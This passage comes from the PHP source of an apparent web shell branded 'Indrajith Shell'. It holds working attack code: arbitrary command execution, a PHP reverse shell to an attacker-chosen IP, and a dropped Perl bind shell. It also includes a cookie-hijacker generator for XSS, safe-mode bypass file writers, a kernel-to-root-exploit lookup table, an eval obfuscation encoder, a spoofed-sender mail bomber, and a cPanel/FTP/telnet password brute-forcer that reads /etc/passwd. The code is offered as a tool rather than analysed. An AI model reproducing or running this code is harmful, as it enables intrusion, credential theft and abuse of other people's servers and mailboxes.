  569.         alert("Access Denied for this Operation");
  570.         exit;
  571.     }
  572. }
  573. function deldirs($d_dir)
  574. {
  575.     $d_files= glob($d_dir.'*', GLOB_MARK);
  576.     foreach($d_files as $d_file)
  577.     {
  578.         if(is_dir($d_file))
  579.         {
  580.             deldirs($d_file);
  581.         }
  582.         else
  583.         {
  584.             unlink($d_file);
  585.         }
  586.     }
  587.     if(is_dir($d_dir))
  588.     {
  589.         if(rmdir($d_dir))
  590.         {
  591.             alert("Deleted Directory Successfully");
  592.         }
  593.         else
  594.         {
  595.             alert("Access Denied for this Operation");
  596.         }
  597.     }
  598. }
  599.  
  600. function code_viewer()
  601. {
  602.     $path=$_GET['path'];
  603.     $r_file=$_GET['read'];
  604.     $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
  605.     if($r_content)
  606.     {
  607.         $rr_content=$r_content;
  608.     }
  609.     else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  610.     {
  611.         $fd = fopen($r_file, "rb");
  612.     if (!$fd)
  613.         {
  614.             alert("Permission Denied");
  615.         }
  616.     else
  617.         {
  618.             while(!feof($fd))
  619.             {
  620.                 $rr_content=wordwrap(htmlspecialchars(fgets($fd)));
  621.             }
  622.         }
  623.         fclose($fd);
  624.     }
  625.     echo "<div id=result><center><h2>View File</h2></center><hr /><br /><font color=red>Edit File</font><font color=green> : </font><font color=#999><a style='text-decoration:none; color:green;' href='?path={$path}&amp;edit=".$_GET['read']."'>".  basename($_GET['read'])  ."</a></font><br /><br /><hr /><pre><code>".$rr_content."</code></pre><br /><br /><hr /><br /><br /></div>";
  626. }
  627. function copy_file_ui()
  628. {
  629.     echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=".$_GET['copy']." > To : <input size=40 name='c_target' value=".$_GET['path'].$sep."> Name : <input name='cn_name'><input type='submit' value='   >>   ' /></form></table><br /><br /><hr /><br /><br /><br /></center></div>";
  630. }
  631. function copy_file_bg()
  632. {
  633.     global $sep;
  634.     if(function_exists(copy))
  635.     {
  636.         if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name']))
  637.         {
  638.             alert("Succeded");
  639.         }
  640.         else
  641.         {
  642.             alert("Access Denied");
  643.         }
  644.     }
  645. }
  646. function ch_perm_bg()
  647. {
  648.     if(isset($_GET['p_filex']) && isset($_GET['new_perm']))
  649.     {
  650.         if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE)
  651.         {
  652.             alert("Succeded. Permission Changed!!!");
  653.         }
  654.         else
  655.         {
  656.             alert("Access Denied for This Operation");
  657.         }
  658.     }
  659. }
  660. function ch_perm_ui()
  661. {
  662.     $p_file=$_GET['perm'];
  663.     echo "<div id =result><center><h2>New Permission</h2><hr /><p><form method='GET'><input type='hidden' name='path' value=".getcwd()." ><input name='p_filex' type=hidden value={$p_file} >New Permission : <input name='new_perm' isze='40' value=0".substr(sprintf('%o', fileperms($p_file)), -3)."><input type='submit' value='   >>   ' /></form></p><p>Full Access : <font color=red>755</font><br />Notice : <font color=red>Don't use Unix Access like 777, 666, etc. Use 755, 655, etc</p><br /><br /><hr /><br /><br /></center></div>";
  664.     ch_perm_bg();
  665. }
  666. function mk_file_ui()
  667. {
  668.     chdir($_GET['path']);
  669.     echo "<div id=result><br /><br /><font color=red><form method='GET'>
  670.          <input type='hidden' name='path' value=".getcwd().">
  671.          New File Name : <input size='40' name='new_f_name' value=".$_GET['new_file']."></font><br /><br /><hr /><br /><center>
  672.          <textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr />
  673.          <input class='input_big' type='submit' value='  Save  ' /></form></center></div>";
  674. }
  675. function mk_file_bg()
  676. {
  677.     chdir($_GET['path']);
  678.     $c_path=$_GET['path'];
  679.     $c_file=$_GET['new_f_name'];
  680.     $c_file_contents=$_GET['n_file_content'];
  681.     $handle=fopen($c_file, "w");
  682.     if(!$handle)
  683.     {
  684.         alert("Permission Denied");
  685.     }
  686.     else
  687.     {
  688.         fwrite($handle,$c_file_contents);
  689.         alert("Your changes were Successfully Saved!");
  690.     }
  691.     fclose($handle);
  692. }
  693. function create_dir()
  694. {
  695.     chdir($_GET['path']);
  696.     $new_dir=$_GET['new_dir'];
  697.     if(is_writable($_GET['path']))
  698.     {
  699.         mkdir($new_dir);
  700.         alert("Direcory Created Successfully");
  701.         exit;
  702.     }
  703.     else
  704.     {
  705.         alert("Access Denied for this Operation");
  706.         exit;
  707.     }
  708. }
  709. function cmd($cmd)
  710. {
  711.     chdir($_GET['path']);
  712.     $res="";
  713.     if($_GET['cmdexe'])
  714.     {
  715.         $cmd=$_GET['cmdexe'];
  716.     }
  717.     if(function_exists('shell_exec'))
  718.     {
  719.         $res=shell_exec($cmd);
  720.     }
  721.     else if(function_exists('exec'))
  722.     {
  723.         exec($cmd,$res);
  724.         $res=join("\n",$res);
  725.     }
  726.     else if(function_exists('system'))
  727.     {
  728.         ob_start();
  729.         system($cmd);
  730.         $res = ob_get_contents();
  731.         ob_end_clean();  
  732.     }
  733.     elseif(function_exists('passthru'))
  734.     {
  735.     ob_start();
  736.     passthru($cmd);
  737.     $res=ob_get_contents();
  738.     ob_end_clean();
  739.     }
  740.     else if(function_exists('proc_open'))
  741.     {
  742.         $descriptorspec = array(0 => array("pipe", "r"),  1 => array("pipe", "w"),  2 => array("pipe", "w"));
  743.         $handle = proc_open($cmd ,$descriptorspec , $pipes);
  744.         if(is_resource($handle))
  745.         {
  746.             if(function_exists('fread') && function_exists('feof'))
  747.             {
  748.                 while(!feof($pipes[1]))
  749.                 {
  750.                     $res .= fread($pipes[1], 512);
  751.                 }
  752.             }
  753.             else if(function_exists('fgets') && function_exists('feof'))
  754.             {
  755.                 while(!feof($pipes[1]))
  756.                 {
  757.                     $res .= fgets($pipes[1],512);
  758.                 }
  759.             }
  760.         }
  761.         pclose($handle);
  762.     }
  763.    
  764.     else if(function_exists('popen'))
  765.     {
  766.         $handle = popen($cmd , "r");
  767.         if(is_resource($handle))
  768.         {
  769.             if(function_exists('fread') && function_exists('feof'))
  770.             {
  771.                 while(!feof($handle))
  772.                 {
  773.                     $res .= fread($handle, 512);
  774.                 }
  775.             }
  776.             else if(function_exists('fgets') && function_exists('feof'))
  777.             {
  778.                 while(!feof($handle))
  779.                 {
  780.                     $res .= fgets($handle,512);
  781.                 }
  782.             }
  783.         }
  784.         pclose($handle);
  785.     }
  786.    
  787.     $res=wordwrap(htmlspecialchars($res));
  788.     if($_GET['cmdexe'])
  789.     {
  790.         echo "<div id=result><center><font color=green><h2>r00t@TOF:~#</h2></center><hr /><pre>".$res."</font></pre></div>";
  791.     }
  792.     return $res;
  793. }
  794. function upload_file()
  795. {
  796.     chdir($_POST['path']);
  797.     if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name']))
  798.     {
  799.         alert("Uploaded File Successfully");
  800.     }
  801.     else
  802.     {
  803.         alert("Access Denied!!!");
  804.     }
  805. }
  806.  
  807. function reverse_conn_ui()
  808. {
  809.     global $your_ip;
  810.     echo "<div id='result'>
  811.          <center><h2>Reverse Shell</h2><hr />
  812.          <br /><br /><form method='GET'><table class=tbl>
  813.          <tr>
  814.          <td><select name='rev_option' style='color:green; background-color:black; border:1px solid #666;'>
  815.                      <option>PHP Reverse Shell</option>
  816.                      <option>PERL Bind Shell</option>
  817.          </select></td></tr><tr>
  818.          <td>Your IP : <input name='my_ip' value=".$your_ip.">
  819.          PORT : <input name='my_port' value='560'>
  820.          <input type='submit' value='   >>   ' /></td></tr></form>
  821.          <tr></tr>
  822.          <tr><td><font color=red>PHP Reverse Shell</font> : <font color=green> nc -l -p <i>port</i></font></td></tr><tr><td><font color=red>PERL Bind Shell</font> : <font color=green> nc <i>server_ip port</i></font></td></tr></table> </div>";
  823. }
  824. function reverse_conn_bg()
  825. {
  826.     global $os;
  827.     $option=$_REQUEST['rev_option'];
  828.     $ip=$_GET['my_ip'];
  829.     $port=$_GET['my_port'];
  830.     if($option=="PHP Reverse Shell")
  831.     {
  832.         echo "<div id=result><h2>RESULT</h2><hr /><br />";
  833.         function printit ($string)
  834.         {
  835.             if (!$daemon)
  836.             {
  837.         print "$string\n";
  838.             }
  839.         }
  840.         $chunk_size = 1400;
  841.         $write_a = null;
  842.         $error_a = null;
  843.         $shell = 'uname -a; w; id; /bin/sh -i';
  844.         $daemon = 0;
  845.         $debug = 0;
  846.         if (function_exists('pcntl_fork'))
  847.         {
  848.             $pid = pcntl_fork();
  849.             if ($pid == -1)
  850.             {
  851.         printit("ERROR: Can't fork");
  852.         exit(1);
  853.             }
  854.             if ($pid)
  855.             {
  856.         exit(0);
  857.             }
  858.             if (posix_setsid() == -1)
  859.             {
  860.         printit("Error: Can't setsid()");
  861.         exit(1);
  862.             }
  863.             $daemon = 1;
  864.         }
  865.         else
  866.         {
  867.             printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  868.         }
  869.         chdir("/");
  870.         umask(0);
  871.         $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  872.         if (!$sock)
  873.         {
  874.             printit("$errstr ($errno)");
  875.             exit(1);
  876.         }
  877.         $descriptorspec = array(0 => array("pipe", "r"),  1 => array("pipe", "w"),  2 => array("pipe", "w"));
  878.         $process = proc_open($shell, $descriptorspec, $pipes);
  879.         if (!is_resource($process))
  880.         {
  881.             printit("ERROR: Can't spawn shell");
  882.             exit(1);
  883.         }
  884.         stream_set_blocking($pipes[0], 0);
  885.         stream_set_blocking($pipes[1], 0);
  886.         stream_set_blocking($pipes[2], 0);
  887.         stream_set_blocking($sock, 0);
  888.         printit("<font color=green>Successfully opened reverse shell to $ip:$port </font>");
  889.         while (1)
  890.         {
  891.             if (feof($sock))
  892.             {
  893.         printit("ERROR: Shell connection terminated");
  894.         break;
  895.             }
  896.             if (feof($pipes[1]))
  897.             {
  898.         printit("ERROR: Shell process terminated");
  899.         break;
  900.             }
  901.             $read_a = array($sock, $pipes[1], $pipes[2]);
  902.             $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  903.             if (in_array($sock, $read_a))
  904.             {
  905.         if ($debug) printit("SOCK READ");
  906.         $input = fread($sock, $chunk_size);
  907.         if ($debug) printit("SOCK: $input");
  908.         fwrite($pipes[0], $input);
  909.             }
  910.             if (in_array($pipes[1], $read_a))
  911.             {
  912.         if ($debug) printit("STDOUT READ");
  913.         $input = fread($pipes[1], $chunk_size);
  914.         if ($debug) printit("STDOUT: $input");
  915.         fwrite($sock, $input);
  916.             }
  917.             if (in_array($pipes[2], $read_a))
  918.             {
  919.         if ($debug) printit("STDERR READ");
  920.         $input = fread($pipes[2], $chunk_size);
  921.         if ($debug) printit("STDERR: $input");
  922.         fwrite($sock, $input);
  923.             }
  924.         }
  925.         fclose($sock);
  926.         fclose($pipes[0]);
  927.         fclose($pipes[1]);
  928.         fclose($pipes[2]);
  929.         proc_close($process);
  930.         echo "<br /><br /><hr /><br /><br /></div>";
  931.     }
  932.     else if($option=="PERL Bind Shell")
  933.     {
  934.         global $bind_perl, $os;
  935.         $pbfl=$bind_perl;
  936.         $handlr=fopen("indrajith_perl_bind.pl", "wb");
  937.         if($handlr)
  938.         {
  939.             fwrite($handlr, gzinflate(base64_decode($bind_perl)));
  940.         }
  941.         else
  942.         {
  943.             alert("Access Denied for create new file");
  944.         }
  945.         fclose($handlr);
  946.         if(file_exists("indrajith_perl_bind.pl"))
  947.         {
  948.             if($os=="nix")
  949.             {
  950.                 cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl $port");
  951.             }
  952.             else
  953.             {
  954.                 cmd("perl indrajith_perl_bind.pl $port");
  955.             }
  956.         }
  957.     }
  958. }
  959.  
  960. function cookie_jack()
  961. {
  962.     global $cookie_highjacker;
  963.     echo "<div id=result><center><h2>NOTICE</h2><hr/>";
  964.     if(function_exists('fopen') && function_exists('fwrite'))
  965.     {
  966.         $cook=gzinflate(base64_decode($cookie_highjacker));
  967.         $han_le=fopen("jith_cookie.php", "w+");
  968.         if($han_le)
  969.         {
  970.             fwrite($han_le, $cook);
  971.             echo "Yes... Cookie highjacker is generated.<br /> Name : <a style='color:green;' target=_blank href=jith_cookie.php>jith_cookie.php</a></font>.<br /> Rename it as 404.php or what you like and highjack cookie of your target.<br />It is usefull in XSS<br />It will make a file <font color=red>configuration.txt</font> in this direcory and save the cookie value in it. :p cheers...<br /><br /><hr /><br /><br /></center></div>";
  972.         }
  973.         else
  974.         {
  975.             echo "<font color=red>Sorry... Generate COOKIE HIGHJACKER failed<br /><br /><hr /><br /><br /></center></div>";
  976.         }
  977.     }
  978. }
  979.  
  980.  
  981.  
  982. function safe_mode_fuck()
  983. {
  984.     global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php;
  985.     $path = chdir($_GET['path']);
  986.     chdir($_GET['path']);
  987.     switch($_GET['safe_mode'])
  988.     {
  989.         case "s_php_ini":
  990.             $s_file=$s_php_ini;
  991.             $s_name="php.ini";
  992.             break;
  993.         case "s_htaccess":
  994.             $s_name=".htaccess";
  995.             $s_file=$s_htaccess;
  996.             break;
  997.         case "s_htaccess_pl":
  998.             $s_name=".htaccess";
  999.             $s_file=$s_htaccess_pl;
  1000.             break;
  1001.         case "s_ini_php":
  1002.             $s_name="ini.php";
  1003.             $s_file=$ini_php;
  1004.             break;
  1005.            
  1006.     }
  1007.     if(function_exists('fopen')&& function_exists('fwrite'))
  1008.     {
  1009.         $s_handle=fopen("$s_name", "w+");
  1010.         if($s_handle)
  1011.         {
  1012.             fwrite($s_handle, $s_file);
  1013.             alert("Operation Succeed!!!");
  1014.         }
  1015.         else
  1016.         {
  1017.             alert("Access Denied!!!");
  1018.         }
  1019.         fclose($s_handle);
  1020.     }
  1021. }
  1022. function safe_mode_fuck_ui()
  1023. {
  1024.     global $path;
  1025.     $path=getcwd();
  1026.     echo "<div id=result><br /><center><h2>Select Your Options</h2><hr />
  1027.    <table class=tbl size=10><tr><td><a href=?path={$path}&amp;safe_mode=s_php_ini>PHP.INI</a></td><td><a href=?path={$path}&amp;safe_mode=s_htaccess>.HTACCESS</a></td><td><a href=?path={$path}&amp;safe_mode=s_htaccess_pl>.HTACCESS(perl)</td><td><a href=?path={$path}&amp;safe_mode=s_ini_php>INI.PHP</td></tr></table><br /><br /></div>";
  1028. }
  1029.  
  1030.  
  1031. function AccessDenied()
  1032. {
  1033.     global $path, $forbid_dir;
  1034.     $path=$_GET['path'];
  1035.     chdir($path);
  1036.     if(function_exists('fopen') && function_exists('fwrite'))
  1037.     {
  1038.         $forbid=fopen(".htaccess", "wb");
  1039.         if($forbid)
  1040.         {
  1041.             fwrite($forbid, $forbid_dir);
  1042.             alert("Opreation Succeeded");
  1043.         }
  1044.         else
  1045.         {
  1046.             alert("Access Denied");
  1047.         }
  1048.         fclose($forbid);
  1049.     }
  1050. }
  1051.  
  1052. function r00t_exploit()
  1053. {
  1054.     $kernel = php_uname();
  1055.     $r00t_db = array('2.6.19'=>'jessica','2.6.20'=>'jessica','2.6.21'=>'jessica','2.6.22'=>'jessica','2.6.23'=>'jessica, vmsplice','2.6.24'=>'jessica, vmspice','2.6.31'=>'enlightment','2.6.18'=>'brk, ptrace, kmod, brk2','2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip,ptrace');
  1056.     foreach($r00t_db as $kern=>$exp)
  1057.     {
  1058.         if(strstr($kernel, $kern))
  1059.         {
  1060.             return $exp;
  1061.         }
  1062.     else
  1063.         {
  1064.             $exp='<font color="red">Not found.</font>';
  1065.             return $exp;
  1066.         }
  1067.     }
  1068. }
  1069.  
  1070. function php_ende_ui()
  1071. {
  1072.     echo "<div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr /><form method='post'><table class=tbl>
  1073.    <tr><td>
  1074.    Method : <select name='typed' style='color:green; background-color:black; border:1px solid #666;'><option>Encode</option><option>Decode</decode></select> TYPE : <select name='typenc' style='color:green; background-color:black; border:1px solid #666;'><option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>
  1075.    </td><tr><td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'>INPUT YOUR CONTENT TO ENCODE/DECODE
  1076.  
  1077. For Encode Input your full source code.
  1078.  
  1079. For Decode Input the encoded part only.</textarea></tr></td></table><hr /><input class='input_big' type='submit' value='   >>   ' /><br /><hr /><br /><br /></form></div>";
  1080. }
  1081. function php_ende_bg()
  1082. {
  1083.     $meth_d=$_POST['typed'];
  1084.     $typ_d=$_POST['typenc'];
  1085.     $c_ntent=$_POST['php_content'];
  1086.     $c_ntent=$c_ntent;
  1087.     switch($meth_d)
  1088.     {
  1089.         case "Encode":
  1090.             switch($typ_d)
  1091.             {
  1092.                 case "GZINFLATE":
  1093.                     $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1094.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
  1095.                     break;
  1096.                 case "GZUNCOMPRESS":
  1097.                     $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1098.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
  1099.                     break;
  1100.                 case "STR_ROT13":
  1101.                     $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>');
  1102.                     $res_t=base64_encode(str_rot13($res_t));
  1103.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
  1104.                     break;                  
  1105.             }
  1106.         break;
  1107.         case "Decode":
  1108.             switch($typ_d)
  1109.             {
  1110.                 case "GZINFLATE":
  1111.                     $res_t=gzinflate(base64_decode($c_ntent));
  1112.                     break;
  1113.                 case "GZUNCOMPRESS":
  1114.                     $res_t=gzuncompress(base64_decode($c_ntent));
  1115.                     break;
  1116.                 case "STR_ROT13":
  1117.                     $res_t=str_rot13(base64_decode($c_ntent));
  1118.                     break;                  
  1119.             }
  1120.         break;
  1121.     }
  1122.     echo "<div id=result><center><h2>INDRAJITH SHELL</h2><hr /><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";
  1123. }
  1124.  
  1125. function massmailer_ui()
  1126. {
  1127.     echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr /><table class=tbl width=40 style='col-width:40'><td><table class=tbl><tr style='float:left;'><td><font color=green size=4>Mass Mail</font></td></tr><form method='POST'><tr style='float:left;'><td> FROM : </td><td><input name='from' size=40 value='ajithkp560@fbi.gov'></td></tr><tr  style='float:left;'><td>TO :</td><td><input size=40 name='to_mail' value='ajithkp560@gmail.com,ajithkp560@yahoo.com'></td></tr><tr  style='float:left;'><td>Subject :</td><td><input size=40 name='subject_mail' value='Hi, GuyZ'></td></tr><tr style='float:left;'><td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing massmail :p</textarea></td><td><input class='input_big' type='submit' value='   >>   '></td></tr></form></table></td>
  1128.    <form method='post'><td> <table class='tbl'><td><font color=green size=4>Mail Bomber</font></td></tr><tr style='float:left;'><td>TO : </td><td><input size=40 name='bomb_to' value='ajithkp560@gmail.com,ajithkp560_mail_bomb@fbi.gov'></td></tr><tr style='float:left;'><td>Subject : </td><td><input size=40 name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'><td>No. of times</td><td><input size=40 name='bomb_no' value='100'></td></tr><tr style='float:left;'><td> <textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content'>I'm doing  E-Mail Bombing :p</textarea> </td><td><input class='input_big' type='submit' value='   >>   '></td></tr></form></table>   </td></tr></table>";
  1129. }
  1130.  
  1131. function massmailer_bg()
  1132. {
  1133.     $from=$_POST['from'];
  1134.     $to=$_POST['to_mail'];
  1135.     $subject=$_POST['subject_mail'];
  1136.     $message=$_POST['mail_content'];
  1137.     if(function_exists('mail'))
  1138.     {
  1139.         if(mail($to,$subject,$message,"From:$from"))
  1140.         {
  1141.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Send... :p</font><br /><br /><hr /><br /><br />";
  1142.         }
  1143.         else
  1144.         {
  1145.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1146.         }
  1147.     }
  1148.     else
  1149.     {
  1150.         echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1151.     }
  1152. }
  1153.  
  1154. function mailbomb_bg()
  1155. {
  1156.     $rand=rand(0, 9999999);
  1157.     $to=$_POST['bomb_to'];
  1158.     $from="president_$rand@whitewhitehouse.gov";
  1159.     $subject=$_POST['bomb_subject']." ID ".$rand;
  1160.     $times=$_POST['bomb_no'];
  1161.     $content=$_POST['bmail_content'];
  1162.     if($times=='')
  1163.     {
  1164.         $times=1000;
  1165.     }
  1166.     while($times--)
  1167.     {
  1168.         if(function_exists('mail'))
  1169.         {
  1170.             if(mail($to,$subject,$message,"From:$from"))
  1171.             {
  1172.                 echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Bombed... :p</font><br /><br /><hr /><br /><br />";
  1173.             }
  1174.             else
  1175.             {
  1176.                 echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1177.             }
  1178.         }
  1179.         else
  1180.         {
  1181.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1182.         }
  1183.     }
  1184. }
  1185.  
  1186.  
  1187. /* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/
  1188. /*------------------------ Credit Goes to Them ---------------------------------*/
  1189. function cpanel_check($host,$user,$pass,$timeout)
  1190. {
  1191.     set_time_limit(0);
  1192.     global $cpanel_port;
  1193.     $ch = curl_init();
  1194.     curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
  1195.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1196.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1197.     curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1198.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1199.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1200.     $data = curl_exec($ch);
  1201.     if ( curl_errno($ch) == 28 )
  1202.     {
  1203.         print "<b><font color=orange>Error :</font> <font color=red>Connection Timeout. Please Check The Target Hostname .</font></b>";
  1204.         exit;
  1205.     }
  1206.     else if (curl_errno($ch) == 0 )
  1207.     {
  1208.         print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"orange\">[~]</font></b><font face=\"Tahoma\"   style=\"font-size: 9pt\"><b><font color=\"green\">
  1209.        Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  1210.     }
  1211.     curl_close($ch);
  1212. }
  1213.  
  1214. function cpanel_crack()
  1215. {
  1216.     set_time_limit(0);
  1217.     global $os;
  1218.     echo "<div id=result>";
  1219.     $cpanel_port="2082";
  1220.         $connect_timeout=5;
  1221.         if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype']))
  1222.         {
  1223.         ?>
  1224.         <center>
  1225.         <form method=post>
  1226.         <table class=tbl>
  1227.             <tr>
  1228.                 <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
  1229.             </tr>
  1230.             <tr>
  1231.                 <td align=center>User names</td><td align=center>Password</td>
  1232.             </tr>
  1233.             <tr>
  1234.                 <td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php
  1235.                 if($os != "win")
  1236.                 {
  1237.                     if(@file('/etc/passwd'))
  1238.                     {
  1239.                         $users = file('/etc/passwd');
  1240.                         foreach($users as $user)
  1241.                         {
  1242.                             $user = explode(':', $user);
  1243.                             echo $user[0] . "\n";
  1244.                         }
  1245.                     }
  1246.                     else
  1247.                     {
  1248.                         $temp = "";
  1249.                         $val1 = 0;
  1250.                         $val2 = 1000;
  1251.                         for(;$val1 <= $val2;$val1++)
  1252.                         {
  1253.                             $uid = @posix_getpwuid($val1);
  1254.                             if ($uid)
  1255.                                  $temp .= join(':',$uid)."\n";
  1256.                          }
  1257.                        
  1258.                          $temp = trim($temp);
  1259.                              
  1260.                          if($file5 = fopen("test.txt","w"))
  1261.                          {
  1262.                             fputs($file5,$temp);
  1263.                              fclose($file5);
  1264.                              
  1265.                              $file = fopen("test.txt", "r");
  1266.                              while(!feof($file))
  1267.                              {
  1268.                                 $s = fgets($file);
  1269.                                 $matches = array();
  1270.                                 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1271.                                 $matches = str_replace("home/","",$matches[1]);
  1272.                                 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1273.                                     continue;
  1274.                                 echo $matches;
  1275.                             }
  1276.                             fclose($file);
  1277.                         }
  1278.                     }
  1279.                 }
  1280.                  ?></textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td>
  1281.             </tr>
  1282.             <tr>
  1283.                 <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
  1284.             </tr>
  1285.             <tr>
  1286.                 <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
  1287.             </tr>
  1288.             <tr>
  1289.                 <td align=center colspan=2><input type="submit" value="   Go    " class=but></td>
  1290.             </tr>
  1291.         </table>
  1292.         </form>
  1293.         </center>
  1294.         <?php
  1295.         }
  1296.         else
  1297.         {
  1298.             if(empty($_POST['username']) || empty($_POST['password']))
  1299.                 echo "<center>Please Enter The Users or Password List</center>";
  1300.             else
  1301.             {
  1302.                 $userlist=explode("\n",$_POST['username']);
  1303.                 $passlist=explode("\n",$_POST['password']);
  1304.    
  1305.                 if($_POST['cracktype'] == "ftp")
  1306.                 {
  1307.                     foreach ($userlist as $user)
  1308.                     {
  1309.                         $pureuser = trim($user);
  1310.                         foreach ($passlist as $password )
  1311.                         {
  1312.                             $purepass = trim($password);
  1313.                             ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1314.                         }
  1315.                     }
  1316.                 }
  1317.                 if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
  1318.                 {
  1319.                     if($cracktype == "telnet")
  1320.                     {
  1321.                         $cpanel_port="23";
  1322.                     }
  1323.                     else
  1324.                         $cpanel_port="2082";
  1325.                     foreach ($userlist as $user)
  1326.                     {
  1327.                         $pureuser = trim($user);
  1328.                         echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
  1329.                         Processing user $pureuser ...</font></b><br><br>";
  1330.                         foreach ($passlist as $password )
  1331.                         {
